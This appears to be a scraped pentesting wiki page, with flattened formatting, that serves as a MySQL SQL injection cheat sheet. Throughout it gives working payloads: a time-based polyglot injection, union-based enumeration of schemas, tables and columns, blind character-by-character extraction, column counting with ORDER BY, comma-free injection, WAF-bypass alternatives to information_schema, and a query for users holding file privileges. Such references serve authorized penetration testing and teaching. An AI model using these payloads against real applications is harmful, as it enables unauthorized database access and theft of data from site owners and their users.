MySQL injection
This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to: https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md
Comment for MySQL version 3.23.02Interesting Functions
Confirm Mysql:
concat('a','b')database()version()user()system_user()@@version@@datadirrand()floor(2.9)length(1)count(1)Useful functions
SELECT hex(database())SELECT conv(hex(database()),16,10) SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')SELECT uncompress(compress(database())) SELECT replace(database(),"r","R")SELECT substr(database(),1,1)='r'SELECT substring(database(),1,1)=0x72SELECT ascii(substring(database(),1,1))=114SELECT database()=char(114,101,120,116,101,115,116,101,114)SELECT group_concat(<COLUMN>) FROM <TABLE>SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()All injection
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"from https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
Flow
Remember that in "modern" versions of MySQL you can substitute "information_schema.tables" for "mysql.innodb_table_stats" (This could be useful to bypass WAFs).
SELECT table_name FROM information_schema.tables WHERE table_schema=database();SELECT column_name FROM information_schema.columns WHERE table_name=""; SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; SELECT user FROM mysql.user WHERE file_priv='Y'; Only 1 value
group_concat()Limit X,1
Blind one by one
substr(version(),X,1)='r'orsubstring(version(),X,1)=0x70orascii(substr(version(),X,1))=112mid(version(),X,1)='5'
Blind adding
LPAD(version(),1...lenght(version()),'1')='asd'...RPAD(version(),1...lenght(version()),'1')='asd'...SELECT RIGHT(version(),1...lenght(version()))='asd'...SELECT LEFT(version(),1...lenght(version()))='asd'...SELECT INSTR('foobarbar', 'fo...')=1
Detect number of columns
Using a simple ORDER
order by 1order by 2order by 3...order by XXXUniOn SeLect 1UniOn SeLect 1,2UniOn SeLect 1,2,3...MySQL Union Based
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemataUniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...SSRF
Learn here different options to abuse a Mysql injection to obtain a SSRF.
WAF bypass tricks
Information_schema alternatives
Remember that in "modern" versions of MySQL you can substitute information_schema.tables for mysql.innodb_table_stats or for sys.x$schema_flattened_keys or for sys.schema_table_statistics
MySQLinjection without COMMAS
Select 2 columns without using any comma (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#Retrieving values without the column name
If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:
select (select "", "") = (SELECT * from demo limit 1); select (select "", "", "") < (SELECT * from demo limit 1); Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:
select (select 1, 'flaf') = (SELECT * from demo limit 1);More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952
MySQL history
You ca see other executions inside the MySQL reading the table: sys.x$statement_analysis
Version alternatives
mysql> select @@innodb_version;+------------------+| @@innodb_version |+------------------+| 5.6.31 |+------------------+mysql> select @@version;+-------------------------+| @@version |+-------------------------+| 5.6.31-0ubuntu0.15.10.1 |+-------------------------+mysql> mysql> select version();+-------------------------+| version() |+-------------------------+| 5.6.31-0ubuntu0.15.10.1 |+-------------------------+最后更新于
这有帮助吗?